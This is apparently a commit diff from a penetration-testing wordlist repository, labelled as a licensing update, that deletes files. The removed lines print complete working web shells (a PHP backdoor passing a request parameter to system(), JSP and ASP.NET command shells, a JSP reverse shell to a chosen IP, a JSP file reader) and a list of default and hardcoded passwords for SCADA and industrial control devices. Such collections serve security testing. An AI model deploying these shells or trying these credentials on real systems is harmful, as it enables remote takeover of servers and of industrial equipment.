Updated licensing.

Discovery/Web_Content/Common_PHP_Filenames.txt

@@ -1,6 +1,5 @@
 default.php
 index.php
-invocactf.php
 view.html.php
 helper.php
 controller.php

Discovery/Web_Content/Logins.fuzz.txt

@@ -29,7 +29,6 @@
 /login.php
 /login.php3
 /login.php4
-/login.jsp
 /login.pl
 /login.py
 /login.rb
@@ -45,4 +44,3 @@
 /typo3/in
 /utilities/TreeView.asp
 /webeditor.php
-/invocactf.php

Discovery/Web_Content/SVNDigger/context/index.txt

@@ -115,7 +115,6 @@ basicindex.tpl
 index.tpl.html
 index.view.php
 index.html.erb
-index.erb
 index_view.php
 index.html.php
 site_index.php

Passwords/scadapass.csv

@@ -1,112 +0,0 @@
-#SCADA StrangeLove Default/Hardcoded Passwords List,,,,,,
-#Find more at http://www.scada.sl,,,,,,
-#release 1.0 by Oxana Andreeva (oxana.andreeva@inbox.ru),,,,,,
-,,,,,,
-Vendor,Device,Default password,Port,Device type,Protocol,Source
-ABB,AC 800M,service:ABB800xA,,Controller ,,https://library.e.abb.com/public/f355a67551218ae7c1257dc0003298c5/3BDS021515-600_-_en_AC_800M_6.0_PROFINET_IO_Configuration.pdf
-ABB,SREA-01,admin:admin,80/tcp,Ethernet Adapter Module,http,https://www.inverterdrive.com/file/ABB-SREA-01-Manual
-B&B ELECTRONICS,CR10 v2,root:root,80/tcp,Industrial router,http,http://tekniska.pl/downloadfile/1400014902-1208342584-pdf
-B&B ELECTRONICS,Conel 4.0.1,root:root,80/tcp,Industrial router,http,http://conel.ru/shared/files/201502/9_411.pdf
-B&B ELECTRONICS,SPECTRE Router,root:root,80/tcp,Router,http,b&b electronics SPECTRE Router.pdf
-B&B ELECTRONICS,ER75i/ER 75i DUO/ER 75i SL/ER75i v2,root:root,80/tcp,Industrial router,http,http://ec-mobile.ru/user_files/File/Conel/ER75i_Manual_RUS.pdf
-B&B ELECTRONICS,LR77 v2 Libratum/LR77 v2,root:root,80/tcp,Industrial router,http,"http://www.induowireless.com/wp-content/uploads/2014/12/lr77-v2-libratum-manual.pdf, http://data.kommago.nl/files/pdf/conel-lr77_v2-handleiding.pdf"
-B&B ELECTRONICS,UR5i v2,root:root,80/tcp,Industrial router,http,http://www.cd.lucom.de/vpn-industrie-router/dokumentation/handbuch/ur5iv2-guide.pdf
-B&B ELECTRONICS,UCR11-v2/UCR11 v2 SL,root:root,80/tcp,Industrial router,http,http://www.induowireless.com/wp-content/uploads/2014/03/ucr11-3g-router-hspa-cdma.pdf
-B&B ELECTRONICS,XR5i v2E/XR5i v2/XR5i/XR5i SL,root:root,80/tcp,Industrial router,http,http://www.cd.lucom.de/vpn-industrie-router/dokumentation/handbuch/xr5iv2e-guide.pdf
-Beck IPC, IPC@CHIP,"PPPSERVER:, ppps:ppps",,PLC,pap/chap,https://www.beck-ipc.com/files/api/scxxx/config.htm
-BinTec Elmeg,BinTec X1200 II,"admin:bintec, ",,Router,,http://www.router-defaults.com/Router/BinTec--x1200-ip-password-username
-BinTec Elmeg,any routers,"(##unknown - means not known or any char):, ##unknown:snmp-Trap , suggested:, admin:1234, admin:password, admin:admin",,Router,,http://www.router-defaults.com/Router/BinTec--x1200-ip-password-username
-BinTec Elmeg,BinTec R230aw,admin:funwerk,,Router,,http://www.tomshw.it/forum/banda-larga/154194-router-bintec.html
-BinTec Elmeg,"bintec W2002T-n, ","admin:funwerk, admin:admin",,WLAN Access Point for applications in rolling stocks,,bintec W2002T-n.jpeg
-Contemporary Control Systems,BASRT-B,admin:admin,80/tcp,Router,http,http://www.ccontrols.com/pdf/TD0712000I2.pdf
-Datasensor,UR5i/UR5i SL,root:root,80/tcp,Router,http,http://datasensor.de/sites/datasensor.de/files/datasheets/UR5i_m_e.pdf
-Digi,DC-ME-01T-S,"user:passwd, root:dbps",,Networking Modules,,http://www.digi.com/support/forum/13553/digi-connect-me-default-password
-Digi,"Digi Connect SP, Digi Connect Wi-SP,  Digi Connect ME,  Digi Connect ME 4 MB, Digi Connect Wi-ME, Digi Connect EM,  Digi Connect Wi-EM",root:dbps,80/tcp,Network Device Server Module,http,http://ftp1.digi.com/support/documentation/90000565_P1.pdf
-Digi,"Digi Connect ES 4/8 SB with Switch, Digi Connect ES 4/8 SB",root:dbps,80/tcp,Concentrator,http,http://ftp1.digi.com/support/documentation/90000565_P1.pdf
-Digi,"ConnectPort TS 4x4, ConnectPort TS 4x2, ConnectPort TS W, ConnectPort TS 8, ConnectPort TS 8 MEI, ConnectPort TS 16",root:dbps,80/tcp,Terminal Server,http,http://ftp1.digi.com/support/documentation/90000565_P1.pdf
-Digi,"Digi Connect WAN, Digi Connect WAN GPRS, Digi Connect WAN GSM-R, Digi Connect WAN VPN, Digi Connect WAN IA, Digi Connect WAN 3G, Digi Connect WAN 3G IA, Digi Connect WAN 4G",root:dbps,80/tcp,Industrial router,http,http://www.acspl.com.au/Manuals/digi_Wan.pdf
-Digi,Digi TransPort WR21/WR44,username:password,80/tcp,Industrial router,http,http://ftp1.digi.com/support/documentation/transport/assets/guides/IG_Digi_WR21.pdf
-Digi,Digi CM,root:dbps,"console port (9600, 8, N, 1)",Industrial router,,http://ftp1.digi.com/support/documentation/90000300_E.pdf
-Digi,DigiOne IAP Serial,root:dbps,80/tcp,Gateway,http,http://web-material3.yokogawa.com/IMMW100EIP.pdf
-Echelon,i.LON® SmartServer,"for ftp and lns servers:, ilon:ilon",,router,"ftp, L2TP",http://www.unicom-bg.com/pdf/systemintegration/iLONproducts/i.LON_SmartServer_Freely_Programmable_Modules_User_Guide.pdf
-Emerson ,DeltaV™ Digital Automation System,Administrator:deltav,,Automation System,,http://www.chem.mtu.edu/chem_eng/current/new_courses/CM4120/2009/Getting%20Started.pdf
-Emerson ,Liebert IntelliSlot Web Card ,"Liebert:Liebert, User:User",23/tcp,Web Card ,telnet,http://www.emersonnetworkpower.com/documentation/en-us/products/monitoring/documents/sl-52615.pdf
-Emerson ,Smart Wireless Gateway 1420,admin:default,80/tcp,Wireless Gateway,http,http://www2.emersonprocess.com/siteadmincenter/PM%20Rosemount%20Documents/00809-0200-4420.pdf
-Emerson ,Network Power® MPH2™ Rack PDU,admin:admin,80/tcp,Rack PDUs,http,https://community.emerson.com/networkpower/support/avocent/power/mph2/m/mediagallery/3093
-Emerson ,UL33 UPS ,123456,,UPS ,,Emerson UL33 UPS.doc
-Emerson ,Control Link Refrigeration System Controller ,0,,Controller ,,http://foodservice.structuralconcepts.com/media/com_sccmanager/temp-controller-info/emerson-control-link-cpc-controller.pdf
-Emerson ,UltraSite,"User 01:100, User 05:200, User 09:300, Engineer:400",,Software,,http://www.emersonclimate.com/Documents/Retail%20Solutions/Manuals/0261004Rev1.pdf
-Emerson ,Avocent® ACS 6000 Advanced Console Server,"admin: avocent, root:linux",,Console Server,"console port, with Telnet, SSH",Emerson Avocent ACS 6000.pdf
-Emerson ,ROCLINK™ 800,LOI:1000,,Software,,http://www.documentation.emersonprocess.com/groups/public/documents/instruction_manuals/d301159x012.pdf
-Emerson ,ControlWave® Micro Quick,"for download project:, SYSTEM:666666",,PLC,,http://www.documentation.emersonprocess.com/groups/public/documents/users_guide/d301425x012.pdf
-Emerson ,IP-KVM Avocent MergePoint Unity,Admin:blank,,Switch,,http://community.emerson.com/networkpower/support/avocent/kvmip/mpunity/w/wiki-mergepoint-unity/363.default-user-name-and-password-for-the-mergepoint-unity-kvm-over-ip-appliance
-ENTES,"EMG-10, EMG-02 , EMG-12","emg12 (for EMG12), emg10 (for EMG10), emg02 (for EMG02)",80/tcp,MODBUS Gateway,http,http://www.entes.com.tr/dosyalar/EMG_Series_EN-ver_2_2.pdf
-eWON,all,adm:adm,80/tcp,Router,http,http://ewon.biz/sites/default/files/aug-004-0-en-ewon_getting_started.pdf
-Helmholz Systeme,NETLink PRO HW 1-1a-1 and FW 1. 54 and higher,admin,,Ethernet Gateway for MPI/PROFIBUS,,Helmholtz Systeme.pdf
-Hirschmann,"RS20/RS30, MICE","admin:private, user:public",80/tcp,Switch,http,"http://www.wwsinternational.com.au/Hirschmann/pdf/quickstart.pdf;, Hirschmann MICE.pdf"
-Hirschmann,RSP 20/25/30/35,"user:public, admin:private",23/tcp (telnet),Industrial router,telnet,Hirschmann RSP20_25_30_35.pdf
-Hirschmann,MACH 4000 Family/MACH 1000 Family/MACH 100 Family/MACH 4002 Family/MACH104 Family Full Gigabit/MACH 1040 Family Full Gigabit,"user:public, admin:private",,Industrial router,,"Hirschmann MACH1040 Full Gigabit.pdf, Hirschmann MACH4002 Family.pdf, Hirschmann MACH1000 Family.pdf, Hirschmann MACH4000 Family.pdf, http://www.industrialcomms.co.uk/images/pdf/IG_MACH104_02_1210_en.pdf, http://www.industrialcomms.co.uk/images/pdf/IG_MACH100_03_0709_en.pdf"
-Hirschmann,"OCTOPUS 8M..., OCTOPUS 16M..., OCTOPUS 24M…","user:public, admin:private",23/tcp,Industrial router,telnet,https://www.neteon.net/media/downloads/IG_Octopus8M16M24M_PoETrain_02_0708_en_1.pdf
-IBM,2210,def:trade,, Multiprotocol Router,,http://www.governmentsecurity.org/_/articles/default-logins-and-passwords-for-networked-devices.html
-Moxa,AWK-5232-RCC Series  ,admin:root,80/tcp,Industrial 802.11n wireless AP/bridge/client,http,http://www.moxa.com/doc/man/AWK-3131-RCC_UM_1e.pdf
-Moxa,"Railway Remote I/O (ioLogik E12xx ,  ioLogik E15xx )","Http on Port 9020: ,  1)none:root,  2)none:none",9020/tcp,Remote Ethernet I/O,http,http://www.toolswatch.org/2013/02/new-scada-default-passwords-added-to-dpe-xml-database/
-Moxa,"Cellular Micro RTU Controller (ioLogik W53xx, ioLogik)","administrator:blank, Telnet on port 9900 / 9000:, root:root",9900/9000/tcp,micro RTU controller,telnet or serial console,http://www.toolswatch.org/2013/02/new-scada-default-passwords-added-to-dpe-xml-database/
-Moxa,VPort 461 Industrial Video Encoder ,"admin:admin, <none>:<none>",,Industrial Video Encoder ,telnet,http://www.moxa.com/doc/man/VPort_461_UM_2e.pdf
-Moxa, IA240/241 Embedded computer,"telnet root:root, ftp  root:blank, ppp root:blank, serial console root:root",,"Embedded computers are designed for industrial, automation applications","telnet, ftp, ppp, serial console",http://www.toolswatch.org/2013/02/new-scada-default-passwords-added-to-dpe-xml-database/
-moxa,OnCell Central Manager,admin:admin,8080/tcp,Software,http,http://www.moxa.ru/files/manuals_modems/oncell_central_manager_users_manual_v1.pdf
-moxa,EDS-508A/505A Series,admin:<none>,,Switch,telnet or serial console,http://www.moxa.com/doc/man/eds-508a_505a_um_4e.pdf
-Moxa,OnCell G3100,Admin:Keep <blank>,23/tcp,cellular IP gateways,telnet,http://www.moxa.com/doc/man/OnCell_G3100_Series_Users_Manual_v7.pdf
-Netcomm Wireless,"3G21WB (BigPond Firmware), 3G9WB (BigPond Firmware), N3G001W (Netcomm Firmware), NB14WN (Netcomm Firmware), NB5 (Netcomm Firmware), NB5Plus4 (Netcomm Firmware), NB6Plus4 (Netcomm Firmware), NB6Plus4W (Netcomm Firmware), NNB7 (Netcomm Firmware), NB9WMAXX (Netcomm Firmware), NP804N (Netcomm Firmware)",admin:admin,,Router,,http://www.pcwintech.com/default-router-modem-passwords2
-Netcomm Wireless,"NB1300 Plus 4 (Netcomm Firmware), NP803N (Netcomm Firmware)",admin:password,,Router,,http://www.pcwintech.com/default-router-modem-passwords2
-NOVUS AUTOMATION,Superview,superview:superview ,,SCADA,,http://www.scigiene.com/pdfs/Superview%20Manual.pdf
-OMRON IA,CJ1M CPU Units with Ethernet Functions,"for http: ETHERNET, for ftp: CONFIDENTIAL","80/tcp (http), 21/tcp (ftp)",PLC,"http, ftp",http://omronkft.hu/nostree/pdfs/plc/cs1_cj1/w441-e1-03+cj-series-ethernetfunc+opermanual.pdf
-Ouman ,EH-net server,admin:admin,,HMI Software,,http://docplayer.fi/509891-Palvelin-eh-net-kayttoonotto-ja-yllapito-www-ouman-fi.html
-Phoenix Contact,Logic+,admin:admin,80/tcp,Software,http,https://www.phoenixcontact.com/assets/downloads_ed/global/web_dwl_technical_info/52005213_EN.pdf
-Prosoft Technology,ICX30-HWC,admin:password,80/tcp, Industrial Cellular Gateway,http,http://www.prosoft-technology.com/content/download/8772/168219/version/9/file/ICX30_HWC_User_Manual.pdf
-Rockwell Automation /Allen-Bradley,1756-EN2TSC,Administrator:admin,80/tcp,EtherNet/IP communication module,http,http://literature.rockwellautomation.com/idc/groups/literature/documents/um/enet-um003_-en-p.pdf
-Rockwell Automation /Allen-Bradley,1734-AENT,admin:password,80/tcp, I/O Adapter ,http,http://literature.rockwellautomation.com/idc/groups/literature/documents/um/1734-um011_-en-p.pdf
-Rockwell Automation /Allen-Bradley,1756-EWEB,Administrator:<none>,80/tcp,Web Server Module,http,https://www.jlab.org/Hall-D/Documents/manuals/Allen-Bradley%20stuff/1756-EWEB%20Web%20Server%20Module.pdf
-Rockwell Automation /Allen-Bradley,MicroLogix 1400 Embedded Web Server,"administrator:ml1400, guest:guest",80/tcp,Web Server,http,http://literature.rockwellautomation.com/idc/groups/literature/documents/um/1766-um002_-en-p.pdf
-Rockwell Automation /Allen-Bradley,MicroLogix 1100 Embedded Web Server,"administrator:ml1100, guest:guest",80/tcp,Web Server,http,http://literature.rockwellautomation.com/idc/groups/literature/documents/um/1763-um002_-en-p.pdf
-Rockwell Automation /Allen-Bradley,"PanelView Plus 6 Graphic Terminals, Firmware 6.10 or later/ , PVPlus 6",password,,SCADA,,http://www.manualsdir.com/manuals/580848/rockwell-automation-2711p-xxxx-panelview-plus-6-terminals-user-manual.html?page=54
-Samsung,Integrated Management System DMS,root:rkwjsdusrnth,,Data Management Server,,http://www.tenable.com/plugins/index.php?view=single&id=53878
-Samsung,Integrated Management System S-NET mini,0,,Built-in web server,,http://dvmdownload.com/controls/central-control-options/mst-s3w/technical-tip/SNET%20MINI%20MST-S3W%20SETUP_1%2017%202012.pdf
-Schneider Electric,PowerLogic™ Series 800 Power Meter,0,,PLC,,http://www.powerlogic.com/literature/63230-500-282A1_PM8_Install_Guide.pdf
-Schneider Electric,PowerLogic™ ION8*/7*/6* Energy and power meter,0,,Energy and power meter,,"http://www2.schneider-electric.com/library/SCHNEIDER_ELECTRIC/SE_LOCAL/APS/209510_35F6/8650_Install_Guide.pdf, http://azzo.com.au/wp-content/uploads/2015/08/ION7550-RTU-UserGuide.pdf"
-Schneider Electric,PowerLogicTM Ethernet Gateway EGX300/EGX100,Administrator:Gateway,80/tcp,Integrated gateway-server,http,http://azzo.com.au/wp-content/uploads/2015/05/PowerLogic-EGX300-Users-Guide.pdf
-Schneider Electric,POWERLOGIC® EGX200 or EGX400 with firmware version 5.5 or higher,"Administrator:admin, User 1:master, User 2:engineer, User 3:operator",80/tcp,gateway-server,http,http://www.powerlogic.com/literature/63230-314-208A3.pdf
-Schneider Electric,Modicon Quantum,"ftpuser/password, qbf77101/hexakisoctahedron, USER:USERUSER",80/tcp,PLC,http,"http://www.digitalbond.com/tools/basecamp/schneider-modicon-quantum/, http://www.schneider-electric.cn/downloads//85257689000007EE/All/01507367599A9DC985257871005F4B3D/$File/EIO0000000121EN.pdf"
-Schneider Electric,Modicon M340 for Ethernet,"ntpupdate:ntpupdate (Using an FTP client, store your rules in the file:, /FLASH0/wwwroot/conf/NTP/customrules), USER:USER (FTP Setup page via HTTP, HTTP credentials)",,PLC,"ftp, http",https://dariusfreamon.wordpress.com/2013/12/08/schneider-modicon-m340-for-ethernet-multiple-default-credentials/
-Schneider Electric,"PM8000, PM8240, PM8243, PM8244",8000:00:00,80/tcp,PLC,http,http://www2.schneider-electric.com/sites/corporate/en/support/faq/faq_main.page?page=content&country=APS_GLOBAL&lang=en&locale=en_US&id=FA243275&redirect=true
-Schneider Electric,TSX ETG 1000,"HTTP server, pap: USER:USER, FTP:, wsupgrade:wsupgrade",21 TCP,PLC,"ftp, pap, http",http://www.is-com.ru/files/net_tsxetg1000.pdf
-Schneider Electric,ETG100,Administrator:Gateway,,PLC,,http://www.schneider-electric.co.in/sites/india/en/support/faq/main_faq.page?page=content&country=IN&lang=en&id=FA138738&locale=en_US&redirect=true
-Schneider Electric,M258,adm:adm,80/tcp,PLC,http,http://ewon.biz/sites/default/files/aug-054-0-en-remote_access_for_schneider_m258_plcs.pdf
-Schneider Electric,Quantum NOE 771 xx,"ftp, http: , USER:USER",,Ethernet Modules,"ftp, http",https://igate.alamedaelectric.com/Modicon%20Documents/PLC%20Quantum%20PLC%20NOE771xx%20User%20Manual%20v5.0.pdf
-siemens ,Simatic S7-300 (pre-2009 versions),"Hardcoded password:, Basisk:Basisk",,PLC,telnet. Http,http://www.wired.com/2011/08/siemens-hardcoded-password/
-siemens ,Scalance,"admin:admin, user:user",,Industrial Ethernet switche,,https://www.acunetix.com/vulnerabilities/network/vulnerability/siemens-scalance-default-credentials/
-siemens ,"Scalance (x 200, W788-1PRO,   W788-2PRO, etc.)","Admin:admin, User:user, for FTP access:, siemens:siemens",80/tcp,"Industrial Wireless LAN, Industrial Ethernet Switches","ftp, http","https://cache.industry.siemens.com/dl/files/728/25508728/att_4008/v1/BA_SCALANCE-X-200_76.pdf, https://www.acunetix.com/vulnerabilities/network/vulnerability/siemens-scalance-default-credentials/"
-siemens ,SyncoTM living Web server OZW772  V2.0,Administrator:Password,,Web-server,,http://www.toolswatch.org/2013/02/new-scada-default-passwords-added-to-dpe-xml-database/
-siemens ,Siemens WinCC 7.x,"winccd:winccpass, wincce:winccpass, DMUser:Data&Pass, Administrator:Administrator",,HMI Software,,http://www.toolswatch.org/2013/02/new-scada-default-passwords-added-to-dpe-xml-database/
-siemens ,Ruggedcom RMC30,admin:admin,80/tcp,Industrial router,http,Siemens Ruggedcom RMC30.pdf
-siemens ,"RuggedSwitch, RS8000 / RS1600 / RS900",admin,,Industrial router,,http://www.techsalesnw.com/oldwebsite/products/ethernet/rc_files/RuggedSwitch%20User%20Guide%20v1.5.1.pdf
-Siemens ,Siemens Climatix,"Level 6 End users:, 1000, Level 4 Service operator: , 2000, Level 2 OEM:, 6000",,PLC,,http://www.ivprodukt.se/documents/ivprodukt/documents/styr%20climatix/basis%20document%20climatix%20control%20system%20bdcx.100820.01.gb.pdf
-Sierra Wireless,AirLink,sconsole:12345,"12345/tcp, 2332/tcp",3G/4G gateway,"telnet, ssh",official documentation
-Sierra Wireless,AirLink,"user:12345, viewer:12345",9191/tcp,3G/4G gateway,http,official documentation
-Stulz GmbH,Stulz WIB 8000,"Administrator, highest authorization:, ganymed, Medium authorization:, kallisto, Lowest authorization:, europa",,PLC,,https://dariusfreamon.wordpress.com/2013/09/07/stulz-wib-8000-air-conditioning-web-interface-board-multiple-vulnerabilities/
-TAC AB,"TAC Xenta 500/700/911/913, TAC Xenta511, TAC Xenta527, ",root:root,,PLC,,http://www.xref.be/dpdf/tac_xenta911_xenta511_manuel_uk.pdf
-Tecomat ,Tecomat Foxtrot ,"0:0 (role 0) , 1:1 (role 1), 2:2 (role 2), 3:3 (role 3), 4:4 (role 4), 5:5 (role 5), 6:6 (role 6), 7:7 (role 7), 8:8 (role 8), 9:9 (role 9) ",,PLC,,http://dsec.ru/ipm-research-center/notification-of-vulnerabilities/tecomat_plc_paroli_po_umolchaniyu/
-Tridium,NiagaraAX,tridium:niagara,,"Software for JACE-2, JACE-403 or JACE-545",,http://www.hvacc.net/pdf/tridium/docs_3.2.16/docJaceStartup/docJaceStartup.pdf
-Turck,BL20-E-GW-EN,password,80/tcp,PLC,http,http://pdb.turck.de/media/_in/Anlagen/D301173.pdf
-Wago,WAGO-I/O-SYSTEM 750,"admin:wago, user:user, guest:guest",80/tcp,Controller ,http,http://www.wago.spb.ru/upload/information_system_28/3/2/8/item_328/information_items_property_340.pdf
-Wago,WAGO-I/O-IPC 758-870/000-xxx,"http, ftp:, user:user00 , administrator:, su:ko2003wa",80/tcp (http),Compact Industrial PC ,"http, ftp",http://www.wago.com/wagoweb/documentation/758/eng_manu/870/q07580870_00000000_2en.pdf
-Wago,Modular I/O-System Linux Fieldbus Coupler 750-860 ,"root:wago , admin:wago, user:user , guest:guest ",,PLC,,http://www.wago.com/wagoweb/documentation/750/eng_manu/coupler_controller/m07500860_00000000_0en.pdf
-Wellintech,KingSCADA 3.0,administrator:administrator (role KVAdministrator),,Software,,http://www.slideshare.net/DefconRussia/pavel-volobuev-alexander-minozhenko-alexander-polyakov-practical-demonstration-of-typical-attacks-and-0days-in-scada-and-plccontrollers
-Westermo,TDW 33,"no password, just return, Hardcoded password:, n3Y9kA6otYZu8 , (?? TD-36)",,Industrial Modem,,Westermo TDW 33.pdf
-Westermo,MRD-305-DIN/MRD-310/MRD-315/MRD-330/MRD-355/MRD-350/MRD-455,admin:westermo,80/tcp,Industrial router,http,"http://www.eternity-sales.com/westermo/files/westermo_ug_6623-2266_mrd-305-DIN_en.pdf, Westermo MRD 330.pdf"
-Westermo,"RedFox Series, Wolverine Series, Lynx Series, Falcon Series, Viper Series",admin:westermo,80/tcp,Industrial router,http,http://www.westermosales.com/pdfs/westermo_mg_6101-3201_weos.pdf
-Wonderware,Intouch,Administrator:Wonderware,,SCADA,,http://www.automation-talk.info/2011/01/default-intouch-login-username-password.html
-Yokogawa,YFGW410 gateway,admin:!admin,,Wireless Management Station,,http://www.yokogawa.com/us/support/knowledgebase/i-cannot-login-to-the-yfgw410-gateway-what-is-the-default-username-and-password-of-a-yfgw410-isa100-gateway.htm
-Yokogawa,DX1000/DX1000N/DX2000 Advanced,"Administrator 1:Admin1, Administrator 2:Admin2, ..., Administrator 5:Admin5, User 1:User01, ..., User 90:User90",,Software,,http://web-material3.yokogawa.com/IM04L41B01-05EN_020.pdf
-Yokogawa,CENTUM CS 3000 DCS,CENTUM:CENTUM,,Distributed Control System,,http://www.allinterview.com/showanswers/170266/having-yokogawa-centum-cs-3000-dcs-2-fcs-4-operation-download-message-appears-eq.html
-Yokogawa,EJX910A Multivariable Transmitter HART Communication Type,"YOKOGAWA. (to release the Write Protect mode), ",,Multivariable transmitter,,http://www.controlswarehouse.com/sheets/meriam/EJX910HARTIM01C25R02-01E_001.pdf
-Yokogawa,WT 3000 Driver ,anonymous:blank (Ethernet access),,Precision Power Analyzer,,Yokagawa WT3000.doc

Payloads/FUZZDB_Simple.php

@@ -1,17 +0,0 @@
-<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
-
-<?php
-
-if(isset($_REQUEST['cmd'])){
-        echo "<pre>";
-        $cmd = ($_REQUEST['cmd']);
-        system($cmd);
-        echo "</pre>";
-        die;
-}
-
-?>
-
-Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
-
-<!--    http://michaeldaw.org   2006    -->

Payloads/FUZZDB_cmd.jsp

@@ -1,35 +0,0 @@
-<%@ page import="java.util.*,java.io.*"%>
-<%
-//
-// JSP_KIT
-//
-// cmd.jsp = Command Execution (unix)
-//
-// by: Unknown
-// modified: 27/06/2003
-//
-%>
-<HTML><BODY>
-<FORM METHOD="GET" NAME="myform" ACTION="">
-<INPUT TYPE="text" NAME="cmd">
-<INPUT TYPE="submit" VALUE="Send">
-</FORM>
-<pre>
-<%
-if (request.getParameter("cmd") != null) {
-        out.println("Command: " + request.getParameter("cmd") + "<BR>");
-        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
-        OutputStream os = p.getOutputStream();
-        InputStream in = p.getInputStream();
-        DataInputStream dis = new DataInputStream(in);
-        String disr = dis.readLine();
-        while ( disr != null ) {
-                out.println(disr); 
-                disr = dis.readLine(); 
-                }
-        }
-%>
-</pre>
-</BODY></HTML>
-
-

Payloads/FUZZDB_cmdasp.aspx

@@ -1,42 +0,0 @@
-<%@ Page Language="C#" Debug="true" Trace="false" %>
-<%@ Import Namespace="System.Diagnostics" %>
-<%@ Import Namespace="System.IO" %>
-<script Language="c#" runat="server">
-void Page_Load(object sender, EventArgs e)
-{
-}
-string ExcuteCmd(string arg)
-{
-ProcessStartInfo psi = new ProcessStartInfo();
-psi.FileName = "cmd.exe";
-psi.Arguments = "/c "+arg;
-psi.RedirectStandardOutput = true;
-psi.UseShellExecute = false;
-Process p = Process.Start(psi);
-StreamReader stmrdr = p.StandardOutput;
-string s = stmrdr.ReadToEnd();
-stmrdr.Close();
-return s;
-}
-void cmdExe_Click(object sender, System.EventArgs e)
-{
-Response.Write("<pre>");
-Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
-Response.Write("</pre>");
-}
-</script>
-<HTML>
-<HEAD>
-<title>awen asp.net webshell</title>
-</HEAD>
-<body >
-<form id="cmd" method="post" runat="server">
-<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
-<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
-<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
-</form>
-</body>
-</HTML>
-
-<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
-<!--    http://michaeldaw.org   04/2007    -->

Payloads/FUZZDB_jsp-reverse.jsp

@@ -1,91 +0,0 @@
-// backdoor.jsp
-// http://www.security.org.sg/code/jspreverse.html
-
-<%@
-page import="java.lang.*, java.util.*, java.io.*, java.net.*"
-% >
-<%!
-static class StreamConnector extends Thread
-{
-        InputStream is;
-        OutputStream os;
-
-        StreamConnector(InputStream is, OutputStream os)
-        {
-                this.is = is;
-                this.os = os;
-        }
-
-        public void run()
-        {
-                BufferedReader isr = null;
-                BufferedWriter osw = null;
-
-                try
-                {
-                        isr = new BufferedReader(new InputStreamReader(is));
-                        osw = new BufferedWriter(new OutputStreamWriter(os));
-
-                        char buffer[] = new char[8192];
-                        int lenRead;
-
-                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
-                        {
-                                osw.write(buffer, 0, lenRead);
-                                osw.flush();
-                        }
-                }
-                catch (Exception ioe)
-
-                try
-                {
-                        if(isr != null) isr.close();
-                        if(osw != null) osw.close();
-                }
-                catch (Exception ioe)
-        }
-}
-%>
-
-<h1>JSP Backdoor Reverse Shell</h1>
-
-<form method="post">
-IP Address
-<input type="text" name="ipaddress" size=30>
-Port
-<input type="text" name="port" size=10>
-<input type="submit" name="Connect" value="Connect">
-</form>
-<p>
-<hr>
-
-<%
-String ipAddress = request.getParameter("ipaddress");
-String ipPort = request.getParameter("port");
-
-if(ipAddress != null && ipPort != null)
-{
-        Socket sock = null;
-        try
-        {
-                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
-
-                Runtime rt = Runtime.getRuntime();
-                Process proc = rt.exec("cmd.exe");
-
-                StreamConnector outputConnector =
-                        new StreamConnector(proc.getInputStream(),
-                                          sock.getOutputStream());
-
-                StreamConnector inputConnector =
-                        new StreamConnector(sock.getInputStream(),
-                                          proc.getOutputStream());
-
-                outputConnector.start();
-                inputConnector.start();
-        }
-        catch(Exception e) 
-}
-%>
-
-<!--    http://michaeldaw.org   2006    -->

Payloads/FUZZDB_list.jsp

@@ -1,77 +0,0 @@
-<%@ page import="java.util.*,java.io.*"%>
-<%
-//
-// JSP_KIT
-//
-// list.jsp = Directory & File View
-//
-// by: Sierra
-// modified: 27/06/2003
-//
-%>
-<%
-if(request.getParameter("file")==null) {
-	%>
-	<HTML><BODY>
-	<FORM METHOD="POST" NAME="myform" ACTION="">
-	<INPUT TYPE="text" NAME="file">
-	<INPUT TYPE="submit" VALUE="Send">
-	</FORM>
-	<%
-	}
-%>
-<% //read the file name.
-try { 
-File f = new File(request.getParameter("file"));
-if(f.isDirectory()) {
-	int i;
-	String fname = new String("Unknown");
-	String fcolor = new String("Black");
-	%>
-	<HTML><BODY>
-	<FONT Face="Courier New, Helvetica" Color="Black">
-	<%
-	out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
-	File flist[] = f.listFiles();
-	for(i=0; i<flist.length; i++) {
-		fname = new String( flist[i].toString());
-		out.print("(");
-		if(flist[i].isDirectory() == true) {
-			out.print("d");
-			fname = fname + "/";
-			fcolor = new String("Blue");
-			} else if( flist[i].isFile() == true ) {
-			out.print("-");
-			fcolor = new String("Green");
-			} else {
-			out.print("?");
-			fcolor = new String("Red");
-			}
-		if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
-		if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
-		out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
-		}
-	%>
-	</FONT></BODY></HTML>
-	<%
-
-	} else {
-	if(f.canRead() == true) {
-		InputStream in = new FileInputStream(f);
-		ServletOutputStream outs = response.getOutputStream();
-		int left = 0;
-			try {
-			while((left) >= 0 ) {
-				left = in.read(); 
-				outs.write(left);
-				}
-			} catch(IOException ex) {ex.printStackTrace();}
-		outs.flush();
-		outs.close();
-		in.close();	
-		} else {
-		out.print("Can't Read file<BR>");
-		}
-	}
-} catch(Exception ex) {ex.printStackTrace();}
-%>

Payloads/PHPInfo/phpinfo.php5

@@ -1 +0,0 @@
-<?php phpinfo(); ?>

Payloads/PHPInfo/phpinfo.php7

@@ -1 +0,0 @@
-<?php phpinfo(); ?>

Payloads/PHPInfo/phpinfo.phpt

@@ -1 +0,0 @@
-<?php phpinfo(); ?>

Payloads/PHPInfo/phpinfo.pht

@@ -1 +0,0 @@
-<?php phpinfo(); ?>

Payloads/README.md

@@ -1,47 +0,0 @@
-## lottapixel
-
-Originally reported at https://hackerone.com/reports/390, addressed on paperclip.
-
